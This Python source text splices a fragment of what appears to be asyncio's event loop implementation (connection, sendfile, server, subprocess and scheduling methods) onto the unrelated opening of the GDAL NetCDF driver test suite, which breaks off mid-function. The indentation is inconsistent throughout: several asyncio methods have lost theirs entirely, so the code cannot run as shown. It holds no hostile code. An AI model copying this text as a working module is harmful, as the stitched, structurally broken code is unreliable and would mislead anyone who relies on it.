                    ', '.join(str(exc) for exc in exceptions)))
    else:
        if sock is None:
            raise ValueError(
                'host and port was not specified and no sock specified')
        if sock.type != socket.SOCK_STREAM:
            # We allow AF_INET, AF_INET6, AF_UNIX as long as they
            # are SOCK_STREAM.
            # We support passing AF_UNIX sockets even though we have
            # a dedicated API for that: create_unix_connection.
            # Disallowing AF_UNIX in this method, breaks backwards
            # compatibility.
            raise ValueError(
                f'A Stream Socket was expected, got {sock!r}')
    # --- Wrap the connected socket in a transport ----------------------
    transport, protocol = await self._create_connection_transport(
        sock, protocol_factory, ssl, server_hostname,
        ssl_handshake_timeout=ssl_handshake_timeout)
    if self._debug:
        # Get the socket from the transport because SSL transport closes
        # the old socket and creates a new SSL socket
        sock = transport.get_extra_info('socket')
        logger.debug("%r connected to %s:%r: (%r, %r)",
                     sock, host, port, transport, protocol)
    return transport, protocol
async def _create_connection_transport(
        self, sock, protocol_factory, ssl,
        server_hostname, server_side=False,
        ssl_handshake_timeout=None):
    # Wrap a connected socket in a (possibly SSL) transport and wait for
    # connection_made() to complete before returning.
    sock.setblocking(False)
    protocol = protocol_factory()
    waiter = self.create_future()
    if ssl:
        # ssl=True means "use a default context".
        sslcontext = None if isinstance(ssl, bool) else ssl
        transport = self._make_ssl_transport(
            sock, protocol, sslcontext, waiter,
            server_side=server_side, server_hostname=server_hostname,
            ssl_handshake_timeout=ssl_handshake_timeout)
    else:
        transport = self._make_socket_transport(sock, protocol, waiter)
    try:
        await waiter
    except:
        # Setup (e.g. SSL handshake) failed: clean up the transport.
        transport.close()
        raise
    return transport, protocol
async def sendfile(self, transport, file, offset=0, count=None,
                   *, fallback=True):
    """Send a file to transport.

    Return the total number of bytes which were sent.

    The method uses high-performance os.sendfile if available.

    file must be a regular file object opened in binary mode.

    offset tells from where to start reading the file. If specified,
    count is the total number of bytes to transmit as opposed to
    sending the file until EOF is reached. File position is updated on
    return or also in case of error in which case file.tell()
    can be used to figure out the number of bytes
    which were sent.

    fallback set to True makes asyncio to manually read and send
    the file when the platform does not support the sendfile syscall
    (e.g. Windows or SSL socket on Unix).

    Raise SendfileNotAvailableError if the system does not support
    sendfile syscall and fallback is False.
    """
    if transport.is_closing():
        raise RuntimeError("Transport is closing")
    mode = getattr(transport, '_sendfile_compatible',
                   constants._SendfileMode.UNSUPPORTED)
    if mode is constants._SendfileMode.UNSUPPORTED:
        raise RuntimeError(
            f"sendfile is not supported for transport {transport!r}")
    if mode is constants._SendfileMode.TRY_NATIVE:
        try:
            return await self._sendfile_native(transport, file,
                                               offset, count)
        except exceptions.SendfileNotAvailableError:
            # Fix: the caught exception was bound to an unused name
            # ('as exc'). Fall through to the fallback path below.
            if not fallback:
                raise
    if not fallback:
        # mode is FALLBACK (or native just failed) but fallback disabled.
        raise RuntimeError(
            f"fallback is disabled and native sendfile is not "
            f"supported for transport {transport!r}")
    return await self._sendfile_fallback(transport, file,
                                         offset, count)
async def _sendfile_native(self, transp, file, offset, count):
raise exceptions.SendfileNotAvailableError(
"sendfile syscall is not supported")
    async def _sendfile_fallback(self, transp, file, offset, count):
        # Userspace emulation of sendfile(): read the file chunk by chunk
        # in an executor thread and write to the transport, honoring flow
        # control through _SendfileFallbackProtocol.
        if offset:
            file.seek(offset)
        blocksize = min(count, 16384) if count else 16384
        buf = bytearray(blocksize)
        total_sent = 0
        proto = _SendfileFallbackProtocol(transp)
        try:
            while True:
                if count:
                    # Never read past the requested byte count.
                    blocksize = min(count - total_sent, blocksize)
                    if blocksize <= 0:
                        return total_sent
                view = memoryview(buf)[:blocksize]
                # file.readinto() may block; run it off the event loop thread.
                read = await self.run_in_executor(None, file.readinto, view)
                if not read:
                    return total_sent  # EOF
                # Respect the transport's flow control before writing more.
                await proto.drain()
                transp.write(view[:read])
                total_sent += read
        finally:
            if total_sent > 0 and hasattr(file, 'seek'):
                # Leave the file position reflecting what was actually sent,
                # so callers can use file.tell() even after an error.
                file.seek(offset + total_sent)
            # Restore the transport's original protocol and paused state.
            await proto.restore()
    async def start_tls(self, transport, protocol, sslcontext, *,
                        server_side=False,
                        server_hostname=None,
                        ssl_handshake_timeout=None):
        """Upgrade transport to TLS.

        Return a new transport that *protocol* should start using
        immediately.
        """
        if ssl is None:
            raise RuntimeError('Python ssl module is not available')

        if not isinstance(sslcontext, ssl.SSLContext):
            raise TypeError(
                f'sslcontext is expected to be an instance of ssl.SSLContext, '
                f'got {sslcontext!r}')

        if not getattr(transport, '_start_tls_compatible', False):
            raise TypeError(
                f'transport {transport!r} is not supported by start_tls()')

        waiter = self.create_future()
        ssl_protocol = sslproto.SSLProtocol(
            self, protocol, sslcontext, waiter,
            server_side, server_hostname,
            ssl_handshake_timeout=ssl_handshake_timeout,
            call_connection_made=False)

        # Pause early so that "ssl_protocol.data_received()" doesn't
        # have a chance to get called before "ssl_protocol.connection_made()".
        transport.pause_reading()

        transport.set_protocol(ssl_protocol)
        conmade_cb = self.call_soon(ssl_protocol.connection_made, transport)
        resume_cb = self.call_soon(transport.resume_reading)

        try:
            # waiter is completed by SSLProtocol when the TLS handshake
            # finishes (or fails).
            await waiter
        except BaseException:
            # Handshake failed: tear everything down and cancel the
            # callbacks scheduled above in case they have not run yet.
            transport.close()
            conmade_cb.cancel()
            resume_cb.cancel()
            raise

        return ssl_protocol._app_transport
    async def create_datagram_endpoint(self, protocol_factory,
                                       local_addr=None, remote_addr=None, *,
                                       family=0, proto=0, flags=0,
                                       reuse_port=None,
                                       allow_broadcast=None, sock=None):
        """Create datagram connection.

        Either wraps a caller-supplied *sock* as-is, or resolves
        local/remote addresses into candidate (family, proto) pairs and
        tries each in turn until a socket can be created, bound and
        (optionally) connected.  Returns a (transport, protocol) pair.
        """
        if sock is not None:
            if sock.type != socket.SOCK_DGRAM:
                raise ValueError(
                    f'A UDP Socket was expected, got {sock!r}')
            if (local_addr or remote_addr or
                    family or proto or flags or
                    reuse_port or allow_broadcast):
                # show the problematic kwargs in exception msg
                opts = dict(local_addr=local_addr, remote_addr=remote_addr,
                            family=family, proto=proto, flags=flags,
                            reuse_port=reuse_port,
                            allow_broadcast=allow_broadcast)
                problems = ', '.join(f'{k}={v}' for k, v in opts.items() if v)
                raise ValueError(
                    f'socket modifier keyword arguments can not be used '
                    f'when sock is specified. ({problems})')
            sock.setblocking(False)
            r_addr = None
        else:
            if not (local_addr or remote_addr):
                if family == 0:
                    raise ValueError('unexpected address family')
                addr_pairs_info = (((family, proto), (None, None)),)
            elif hasattr(socket, 'AF_UNIX') and family == socket.AF_UNIX:
                for addr in (local_addr, remote_addr):
                    if addr is not None and not isinstance(addr, str):
                        raise TypeError('string is expected')

                # Remove a stale (dead) UNIX socket file at the bind path so
                # bind() below does not fail; abstract-namespace addresses
                # (leading NUL) have no filesystem entry and are skipped.
                if local_addr and local_addr[0] not in (0, '\x00'):
                    try:
                        if stat.S_ISSOCK(os.stat(local_addr).st_mode):
                            os.remove(local_addr)
                    except FileNotFoundError:
                        pass
                    except OSError as err:
                        # Directory may have permissions only to create socket.
                        logger.error('Unable to check or remove stale UNIX '
                                     'socket %r: %r',
                                     local_addr, err)

                addr_pairs_info = (((family, proto),
                                    (local_addr, remote_addr)), )
            else:
                # join address by (family, protocol)
                addr_infos = {}  # Using order preserving dict
                for idx, addr in ((0, local_addr), (1, remote_addr)):
                    if addr is not None:
                        if not (isinstance(addr, tuple) and len(addr) == 2):
                            raise TypeError('2-tuple is expected')

                        infos = await self._ensure_resolved(
                            addr, family=family, type=socket.SOCK_DGRAM,
                            proto=proto, flags=flags, loop=self)
                        if not infos:
                            raise OSError('getaddrinfo() returned empty list')

                        for fam, _, pro, _, address in infos:
                            key = (fam, pro)
                            if key not in addr_infos:
                                addr_infos[key] = [None, None]
                            addr_infos[key][idx] = address

                # each addr has to have info for each (family, proto) pair
                addr_pairs_info = [
                    (key, addr_pair) for key, addr_pair in addr_infos.items()
                    if not ((local_addr and addr_pair[0] is None) or
                            (remote_addr and addr_pair[1] is None))]

                if not addr_pairs_info:
                    raise ValueError('can not get address information')

            # NOTE(review): this local list shadows the module-level
            # `exceptions` import for the remainder of the function.
            exceptions = []

            # Try each candidate address pair until one works.
            for ((family, proto),
                 (local_address, remote_address)) in addr_pairs_info:
                sock = None
                r_addr = None
                try:
                    sock = socket.socket(
                        family=family, type=socket.SOCK_DGRAM, proto=proto)
                    if reuse_port:
                        _set_reuseport(sock)
                    if allow_broadcast:
                        sock.setsockopt(
                            socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
                    sock.setblocking(False)

                    if local_addr:
                        sock.bind(local_address)
                    if remote_addr:
                        if not allow_broadcast:
                            await self.sock_connect(sock, remote_address)
                        r_addr = remote_address
                except OSError as exc:
                    # Remember the error and try the next candidate.
                    if sock is not None:
                        sock.close()
                    exceptions.append(exc)
                except:
                    if sock is not None:
                        sock.close()
                    raise
                else:
                    break
            else:
                # Every candidate failed: surface the first OSError.
                raise exceptions[0]

        protocol = protocol_factory()
        waiter = self.create_future()
        transport = self._make_datagram_transport(
            sock, protocol, r_addr, waiter)
        if self._debug:
            if local_addr:
                logger.info("Datagram endpoint local_addr=%r remote_addr=%r "
                            "created: (%r, %r)",
                            local_addr, remote_addr, transport, protocol)
            else:
                logger.debug("Datagram endpoint remote_addr=%r created: "
                             "(%r, %r)",
                             remote_addr, transport, protocol)

        try:
            # Wait for the transport to finish initializing (or fail).
            await waiter
        except:
            transport.close()
            raise

        return transport, protocol
async def _ensure_resolved(self, address, *,
family=0, type=socket.SOCK_STREAM,
proto=0, flags=0, loop):
host, port = address[:2]
info = _ipaddr_info(host, port, family, type, proto, *address[2:])
if info is not None:
# "host" is already a resolved IP.
return [info]
else:
return await loop.getaddrinfo(host, port, family=family, type=type,
proto=proto, flags=flags)
async def _create_server_getaddrinfo(self, host, port, family, flags):
infos = await self._ensure_resolved((host, port), family=family,
type=socket.SOCK_STREAM,
flags=flags, loop=self)
if not infos:
raise OSError(f'getaddrinfo({host!r}) returned empty list')
return infos
    async def create_server(
            self, protocol_factory, host=None, port=None,
            *,
            family=socket.AF_UNSPEC,
            flags=socket.AI_PASSIVE,
            sock=None,
            backlog=100,
            ssl=None,
            reuse_address=None,
            reuse_port=None,
            ssl_handshake_timeout=None,
            start_serving=True):
        """Create a TCP server.

        The host parameter can be a string, in that case the TCP server is
        bound to host and port.

        The host parameter can also be a sequence of strings and in that case
        the TCP server is bound to all hosts of the sequence. If a host
        appears multiple times (possibly indirectly e.g. when hostnames
        resolve to the same IP address), the server is only bound once to that
        host.

        Return a Server object which can be used to stop the service.

        This method is a coroutine.
        """
        if isinstance(ssl, bool):
            raise TypeError('ssl argument must be an SSLContext or None')

        if ssl_handshake_timeout is not None and ssl is None:
            raise ValueError(
                'ssl_handshake_timeout is only meaningful with ssl')

        if host is not None or port is not None:
            if sock is not None:
                raise ValueError(
                    'host/port and sock can not be specified at the same time')

            if reuse_address is None:
                # Default SO_REUSEADDR on POSIX (except cygwin) so restarting
                # a server does not fail on sockets in TIME_WAIT.
                reuse_address = os.name == "posix" and sys.platform != "cygwin"
            sockets = []
            if host == '':
                hosts = [None]
            elif (isinstance(host, str) or
                  not isinstance(host, collections.abc.Iterable)):
                hosts = [host]
            else:
                hosts = host

            # Resolve all hosts concurrently.
            fs = [self._create_server_getaddrinfo(host, port, family=family,
                                                  flags=flags)
                  for host in hosts]
            infos = await tasks.gather(*fs)
            # Dedupe: several hosts may resolve to the same address.
            infos = set(itertools.chain.from_iterable(infos))

            completed = False
            try:
                for res in infos:
                    af, socktype, proto, canonname, sa = res
                    try:
                        sock = socket.socket(af, socktype, proto)
                    except socket.error:
                        # Assume it's a bad family/type/protocol combination.
                        if self._debug:
                            logger.warning('create_server() failed to create '
                                           'socket.socket(%r, %r, %r)',
                                           af, socktype, proto, exc_info=True)
                        continue
                    sockets.append(sock)
                    if reuse_address:
                        sock.setsockopt(
                            socket.SOL_SOCKET, socket.SO_REUSEADDR, True)
                    if reuse_port:
                        _set_reuseport(sock)
                    # Disable IPv4/IPv6 dual stack support (enabled by
                    # default on Linux) which makes a single socket
                    # listen on both address families.
                    if (_HAS_IPv6 and
                            af == socket.AF_INET6 and
                            hasattr(socket, 'IPPROTO_IPV6')):
                        sock.setsockopt(socket.IPPROTO_IPV6,
                                        socket.IPV6_V6ONLY,
                                        True)
                    try:
                        sock.bind(sa)
                    except OSError as err:
                        raise OSError(err.errno, 'error while attempting '
                                      'to bind on address %r: %s'
                                      % (sa, err.strerror.lower())) from None
                completed = True
            finally:
                # If resolution/bind failed part-way, close every socket
                # opened so far to avoid leaking file descriptors.
                if not completed:
                    for sock in sockets:
                        sock.close()
        else:
            if sock is None:
                raise ValueError('Neither host/port nor sock were specified')
            if sock.type != socket.SOCK_STREAM:
                raise ValueError(f'A Stream Socket was expected, got {sock!r}')
            sockets = [sock]

        for sock in sockets:
            sock.setblocking(False)

        server = Server(self, sockets, protocol_factory,
                        ssl, backlog, ssl_handshake_timeout)
        if start_serving:
            server._start_serving()
            # Skip one loop iteration so that all 'loop.add_reader'
            # go through.
            await tasks.sleep(0)

        if self._debug:
            logger.info("%r is serving", server)
        return server
async def connect_accepted_socket(
self, protocol_factory, sock,
*, ssl=None,
ssl_handshake_timeout=None):
if sock.type != socket.SOCK_STREAM:
raise ValueError(f'A Stream Socket was expected, got {sock!r}')
if ssl_handshake_timeout is not None and not ssl:
raise ValueError(
'ssl_handshake_timeout is only meaningful with ssl')
transport, protocol = await self._create_connection_transport(
sock, protocol_factory, ssl, '', server_side=True,
ssl_handshake_timeout=ssl_handshake_timeout)
if self._debug:
# Get the socket from the transport because SSL transport closes
# the old socket and creates a new SSL socket
sock = transport.get_extra_info('socket')
logger.debug("%r handled: (%r, %r)", sock, transport, protocol)
return transport, protocol
async def connect_read_pipe(self, protocol_factory, pipe):
protocol = protocol_factory()
waiter = self.create_future()
transport = self._make_read_pipe_transport(pipe, protocol, waiter)
try:
await waiter
except:
transport.close()
raise
if self._debug:
logger.debug('Read pipe %r connected: (%r, %r)',
pipe.fileno(), transport, protocol)
return transport, protocol
async def connect_write_pipe(self, protocol_factory, pipe):
protocol = protocol_factory()
waiter = self.create_future()
transport = self._make_write_pipe_transport(pipe, protocol, waiter)
try:
await waiter
except:
transport.close()
raise
if self._debug:
logger.debug('Write pipe %r connected: (%r, %r)',
pipe.fileno(), transport, protocol)
return transport, protocol
def _log_subprocess(self, msg, stdin, stdout, stderr):
info = [msg]
if stdin is not None:
info.append(f'stdin={_format_pipe(stdin)}')
if stdout is not None and stderr == subprocess.STDOUT:
info.append(f'stdout=stderr={_format_pipe(stdout)}')
else:
if stdout is not None:
info.append(f'stdout={_format_pipe(stdout)}')
if stderr is not None:
info.append(f'stderr={_format_pipe(stderr)}')
logger.debug(' '.join(info))
async def subprocess_shell(self, protocol_factory, cmd, *,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=False,
shell=True, bufsize=0,
encoding=None, errors=None, text=None,
**kwargs):
if not isinstance(cmd, (bytes, str)):
raise ValueError("cmd must be a string")
if universal_newlines:
raise ValueError("universal_newlines must be False")
if not shell:
raise ValueError("shell must be True")
if bufsize != 0:
raise ValueError("bufsize must be 0")
if text:
raise ValueError("text must be False")
if encoding is not None:
raise ValueError("encoding must be None")
if errors is not None:
raise ValueError("errors must be None")
protocol = protocol_factory()
debug_log = None
if self._debug:
# don't log parameters: they may contain sensitive information
# (password) and may be too long
debug_log = 'run shell command %r' % cmd
self._log_subprocess(debug_log, stdin, stdout, stderr)
transport = await self._make_subprocess_transport(
protocol, cmd, True, stdin, stdout, stderr, bufsize, **kwargs)
if self._debug and debug_log is not None:
logger.info('%s: %r', debug_log, transport)
return transport, protocol
async def subprocess_exec(self, protocol_factory, program, *args,
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, universal_newlines=False,
shell=False, bufsize=0,
encoding=None, errors=None, text=None,
**kwargs):
if universal_newlines:
raise ValueError("universal_newlines must be False")
if shell:
raise ValueError("shell must be False")
if bufsize != 0:
raise ValueError("bufsize must be 0")
if text:
raise ValueError("text must be False")
if encoding is not None:
raise ValueError("encoding must be None")
if errors is not None:
raise ValueError("errors must be None")
popen_args = (program,) + args
protocol = protocol_factory()
debug_log = None
if self._debug:
# don't log parameters: they may contain sensitive information
# (password) and may be too long
debug_log = f'execute program {program!r}'
self._log_subprocess(debug_log, stdin, stdout, stderr)
transport = await self._make_subprocess_transport(
protocol, popen_args, False, stdin, stdout, stderr,
bufsize, **kwargs)
if self._debug and debug_log is not None:
logger.info('%s: %r', debug_log, transport)
return transport, protocol
def get_exception_handler(self):
"""Return an exception handler, or None if the default one is in use.
"""
return self._exception_handler
def set_exception_handler(self, handler):
"""Set handler as the new event loop exception handler.
If handler is None, the default exception handler will
be set.
If handler is a callable object, it should have a
signature matching '(loop, context)', where 'loop'
will be a reference to the active event loop, 'context'
will be a dict object (see `call_exception_handler()`
documentation for details about context).
"""
if handler is not None and not callable(handler):
raise TypeError(f'A callable object or None is expected, '
f'got {handler!r}')
self._exception_handler = handler
    def default_exception_handler(self, context):
        """Default exception handler.

        This is called when an exception occurs and no exception
        handler is set, and can be called by a custom exception
        handler that wants to defer to the default behavior.

        This default handler logs the error message and other
        context-dependent information.  In debug mode, a truncated
        stack trace is also appended showing where the given object
        (e.g. a handle or future or task) was created, if any.

        The context parameter has the same meaning as in
        `call_exception_handler()`.
        """
        message = context.get('message')
        if not message:
            message = 'Unhandled exception in event loop'

        exception = context.get('exception')
        if exception is not None:
            # Build an exc_info tuple so logger.error() renders the
            # exception's traceback.
            exc_info = (type(exception), exception, exception.__traceback__)
        else:
            exc_info = False

        # If the context carries no creation traceback but a handle is
        # currently running, attach that handle's creation traceback.
        if ('source_traceback' not in context and
                self._current_handle is not None and
                self._current_handle._source_traceback):
            context['handle_traceback'] = \
                self._current_handle._source_traceback

        log_lines = [message]
        for key in sorted(context):
            if key in {'message', 'exception'}:
                # Already incorporated above.
                continue
            value = context[key]
            if key == 'source_traceback':
                tb = ''.join(traceback.format_list(value))
                value = 'Object created at (most recent call last):\n'
                value += tb.rstrip()
            elif key == 'handle_traceback':
                tb = ''.join(traceback.format_list(value))
                value = 'Handle created at (most recent call last):\n'
                value += tb.rstrip()
            else:
                value = repr(value)
            log_lines.append(f'{key}: {value}')

        logger.error('\n'.join(log_lines), exc_info=exc_info)
    def call_exception_handler(self, context):
        """Call the current event loop's exception handler.

        The context argument is a dict containing the following keys:

        - 'message': Error message;
        - 'exception' (optional): Exception object;
        - 'future' (optional): Future instance;
        - 'task' (optional): Task instance;
        - 'handle' (optional): Handle instance;
        - 'protocol' (optional): Protocol instance;
        - 'transport' (optional): Transport instance;
        - 'socket' (optional): Socket instance;
        - 'asyncgen' (optional): Asynchronous generator that caused
          the exception.

        New keys maybe introduced in the future.

        Note: do not overload this method in an event loop subclass.
        For custom exception handling, use the
        `set_exception_handler()` method.
        """
        if self._exception_handler is None:
            try:
                self.default_exception_handler(context)
            except (SystemExit, KeyboardInterrupt):
                # Never swallow process-exit requests.
                raise
            except BaseException:
                # Second protection layer for unexpected errors
                # in the default implementation, as well as for subclassed
                # event loops with overloaded "default_exception_handler".
                logger.error('Exception in default exception handler',
                             exc_info=True)
        else:
            try:
                self._exception_handler(self, context)
            except (SystemExit, KeyboardInterrupt):
                raise
            except BaseException as exc:
                # Exception in the user set custom exception handler.
                try:
                    # Let's try default handler.
                    self.default_exception_handler({
                        'message': 'Unhandled error in exception handler',
                        'exception': exc,
                        'context': context,
                    })
                except (SystemExit, KeyboardInterrupt):
                    raise
                except BaseException:
                    # Guard 'default_exception_handler' in case it is
                    # overloaded.
                    logger.error('Exception in default exception handler '
                                 'while handling an unexpected error '
                                 'in custom exception handler',
                                 exc_info=True)
def _add_callback(self, handle):
"""Add a Handle to _scheduled (TimerHandle) or _ready."""
assert isinstance(handle, events.Handle), 'A Handle is required here'
if handle._cancelled:
return
assert not isinstance(handle, events.TimerHandle)
self._ready.append(handle)
def _add_callback_signalsafe(self, handle):
"""Like _add_callback() but called from a signal handler."""
self._add_callback(handle)
self._write_to_self()
def _timer_handle_cancelled(self, handle):
"""Notification that a TimerHandle has been cancelled."""
if handle._scheduled:
self._timer_cancelled_count += 1
    def _run_once(self):
        """Run one full iteration of the event loop.

        This calls all currently ready callbacks, polls for I/O,
        schedules the resulting callbacks, and finally schedules
        'call_later' callbacks.
        """

        # If too large a fraction of the timer heap is cancelled handles,
        # rebuild the heap without them; otherwise just pop cancelled
        # handles off the head.
        sched_count = len(self._scheduled)
        if (sched_count > _MIN_SCHEDULED_TIMER_HANDLES and
            self._timer_cancelled_count / sched_count >
                _MIN_CANCELLED_TIMER_HANDLES_FRACTION):
            # Remove delayed calls that were cancelled if their number
            # is too high
            new_scheduled = []
            for handle in self._scheduled:
                if handle._cancelled:
                    handle._scheduled = False
                else:
                    new_scheduled.append(handle)

            heapq.heapify(new_scheduled)
            self._scheduled = new_scheduled
            self._timer_cancelled_count = 0
        else:
            # Remove delayed calls that were cancelled from head of queue.
            while self._scheduled and self._scheduled[0]._cancelled:
                self._timer_cancelled_count -= 1
                handle = heapq.heappop(self._scheduled)
                handle._scheduled = False

        # Pick the select() timeout: 0 when work is already queued (or a
        # stop was requested), the delay until the earliest timer when
        # timers exist, or None (block forever) otherwise.
        timeout = None
        if self._ready or self._stopping:
            timeout = 0
        elif self._scheduled:
            # Compute the desired timeout.
            when = self._scheduled[0]._when
            timeout = min(max(0, when - self.time()), MAXIMUM_SELECT_TIMEOUT)

        event_list = self._selector.select(timeout)
        self._process_events(event_list)

        # Handle 'later' callbacks that are ready.
        end_time = self.time() + self._clock_resolution
        while self._scheduled:
            handle = self._scheduled[0]
            if handle._when >= end_time:
                break
            handle = heapq.heappop(self._scheduled)
            handle._scheduled = False
            self._ready.append(handle)

        # This is the only place where callbacks are actually *called*.
        # All other places just add them to ready.
        # Note: We run all currently scheduled callbacks, but not any
        # callbacks scheduled by callbacks run this time around --
        # they will be run the next time (after another I/O poll).
        # Use an idiom that is thread-safe without using locks.
        ntodo = len(self._ready)
        for i in range(ntodo):
            handle = self._ready.popleft()
            if handle._cancelled:
                continue
            if self._debug:
                # In debug mode, time each callback and warn about slow ones.
                try:
                    self._current_handle = handle
                    t0 = self.time()
                    handle._run()
                    dt = self.time() - t0
                    if dt >= self.slow_callback_duration:
                        logger.warning('Executing %s took %.3f seconds',
                                       _format_handle(handle), dt)
                finally:
                    self._current_handle = None
            else:
                handle._run()
        handle = None  # Needed to break cycles when an exception occurs.
def _set_coroutine_origin_tracking(self, enabled):
if bool(enabled) == bool(self._coroutine_origin_tracking_enabled):
return
if enabled:
self._coroutine_origin_tracking_saved_depth = (
sys.get_coroutine_origin_tracking_depth())
sys.set_coroutine_origin_tracking_depth(
constants.DEBUG_STACK_DEPTH)
else:
sys.set_coroutine_origin_tracking_depth(
self._coroutine_origin_tracking_saved_depth)
self._coroutine_origin_tracking_enabled = enabled
def get_debug(self):
return self._debug
def set_debug(self, enabled):
self._debug = enabled
if self.is_running():
self.call_soon_threadsafe(self._set_coroutine_origin_tracking, enabled)
#!/usr/bin/env python
# -*- coding: utf-8 -*-
###############################################################################
# $Id$
#
# Project: GDAL/OGR Test Suite
# Purpose: Test NetCDF driver support.
# Author: Frank Warmerdam <warmerdam@pobox.com>
#
###############################################################################
# Copyright (c) 2007, Frank Warmerdam <warmerdam@pobox.com>
# Copyright (c) 2008-2013, Even Rouault <even dot rouault at mines-paris dot org>
# Copyright (c) 2010, Kyle Shannon <kyle at pobox dot com>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
###############################################################################
import os
import sys
import shutil
from osgeo import gdal
from osgeo import osr
sys.path.append( '../pymod' )
import gdaltest
import test_cli_utilities
###############################################################################
# Netcdf Functions
###############################################################################
###############################################################################
# Get netcdf version and test for supported files
def netcdf_setup():
    """Detect the netCDF GDAL driver and record its capabilities in gdaltest.

    Sets gdaltest.netcdf_drv, gdaltest.netcdf_drv_version and the
    has_nc2/has_nc4/has_hdf4 flags.  Returns 'skip' when the driver or
    its metadata is unavailable, 'success' otherwise.
    """
    gdaltest.netcdf_drv_version = 'unknown'
    gdaltest.netcdf_drv_has_nc2 = False
    gdaltest.netcdf_drv_has_nc4 = False
    gdaltest.netcdf_drv_has_hdf4 = False
    gdaltest.netcdf_drv_silent = False  # removed stray semicolon

    gdaltest.netcdf_drv = gdal.GetDriverByName('NETCDF')
    if gdaltest.netcdf_drv is None:
        print('NOTICE: netcdf not supported, skipping checks')
        return 'skip'

    # get capabilities from driver
    metadata = gdaltest.netcdf_drv.GetMetadata()
    if metadata is None:
        print('NOTICE: netcdf metadata not found, skipping checks')
        return 'skip'

    # The version item looks like one of:
    #   netcdf library version "3.6.3" of Dec 22 2009 06:10:17 $
    #   netcdf library version 4.1.1 of Mar 4 2011 12:52:19 $
    if 'NETCDF_VERSION' in metadata:
        v = metadata['NETCDF_VERSION']
        v = v[0:v.find(' ')].strip('"')  # keep just the (unquoted) number
        gdaltest.netcdf_drv_version = v

    # Replaced the repeated "key in metadata and metadata[key] == 'YES'"
    # pattern with dict.get(); behavior is identical.
    gdaltest.netcdf_drv_has_nc2 = metadata.get('NETCDF_HAS_NC2') == 'YES'
    gdaltest.netcdf_drv_has_nc4 = metadata.get('NETCDF_HAS_NC4') == 'YES'
    gdaltest.netcdf_drv_has_hdf4 = metadata.get('NETCDF_HAS_HDF4') == 'YES'

    print('NOTICE: using netcdf version ' + gdaltest.netcdf_drv_version +
          ' has_nc2: ' + str(gdaltest.netcdf_drv_has_nc2) + ' has_nc4: ' +
          str(gdaltest.netcdf_drv_has_nc4))

    return 'success'
###############################################################################
# test file copy
# helper function needed so we can call Process() on it from netcdf_test_copy_timeout()
def netcdf_test_copy(ifile, band, checksum, ofile, opts=None, driver='NETCDF'):
    """CreateCopy '../ifile' to *ofile* with the NETCDF driver and verify
    *checksum* on *band*.

    Returns the gdaltest result string ('success'/'fail'/'skip').

    Note: *driver* is accepted for signature compatibility with
    netcdf_test_copy_timeout(); the test itself always uses 'NETCDF'.
    """
    # Fixed mutable default argument: a literal [] default is created once
    # at def-time and shared between calls.
    opts = [] if opts is None else opts
    test = gdaltest.GDALTest('NETCDF', '../' + ifile, band, checksum,
                             options=opts)
    return test.testCreateCopy(check_gt=0, check_srs=0, new_filename=ofile,
                               delete_copy=0, check_minmax=0)
###############################################################################
#test file copy, optional timeout arg
def netcdf_test_copy_timeout(ifile, band, checksum, ofile, opts=None,
                             driver='NETCDF', timeout=None):
    """Like netcdf_test_copy() but optionally abort after *timeout* seconds.

    With a timeout, the copy runs in a separate process so a hung driver
    can be terminated; hitting the timeout counts as 'fail'.
    """
    from multiprocessing import Process

    # Fixed mutable default argument (shared [] created at def-time).
    opts = [] if opts is None else opts
    result = 'success'

    drv = gdal.GetDriverByName(driver)
    # Remove any leftover output from a previous run.
    if os.path.exists(ofile):
        drv.Delete(ofile)

    if timeout is None:
        result = netcdf_test_copy(ifile, band, checksum, ofile, opts, driver)
    else:
        sys.stdout.write('.')
        sys.stdout.flush()
        proc = Process(target=netcdf_test_copy,
                       args=(ifile, band, checksum, ofile, opts))
        proc.start()
        proc.join(timeout)
        # if proc is alive after timeout we must terminate it, and return fail
        # valgrind detects memory leaks when this occurs (although it should never happen)
        if proc.is_alive():
            proc.terminate()
            if os.path.exists(ofile):
                drv.Delete(ofile)
            print('testCreateCopy() for file %s has reached timeout limit of %d seconds' % (ofile, timeout))
            result = 'fail'

    return result
###############################################################################
#check support for DEFLATE compression, requires HDF5 and zlib
def netcdf_test_deflate(ifile, checksum, zlevel=1, timeout=None):
    """Check DEFLATE compression support (requires NC4/HDF5 and zlib).

    Copies *ifile* once uncompressed and once DEFLATE-compressed and
    verifies that the compressed output is strictly smaller.
    """
    try:
        # Only used to verify that multiprocessing is importable here;
        # netcdf_test_copy_timeout() imports it again itself.
        from multiprocessing import Process
    except ImportError:
        # Narrowed from a bare except: only a missing module should skip.
        print('from multiprocessing import Process failed')
        return 'skip'

    if gdaltest.netcdf_drv is None:
        return 'skip'
    if not gdaltest.netcdf_drv_has_nc4:
        return 'skip'

    ofile1 = 'tmp/' + os.path.basename(ifile) + '-1.nc'
    ofile1_opts = ['FORMAT=NC4C', 'COMPRESS=NONE']
    ofile2 = 'tmp/' + os.path.basename(ifile) + '-2.nc'
    ofile2_opts = ['FORMAT=NC4C', 'COMPRESS=DEFLATE', 'ZLEVEL=' + str(zlevel)]

    if not os.path.exists(ifile):
        gdaltest.post_reason('ifile %s does not exist' % ifile)
        return 'fail'

    result1 = netcdf_test_copy_timeout(ifile, 1, checksum, ofile1,
                                       ofile1_opts, 'NETCDF', timeout)
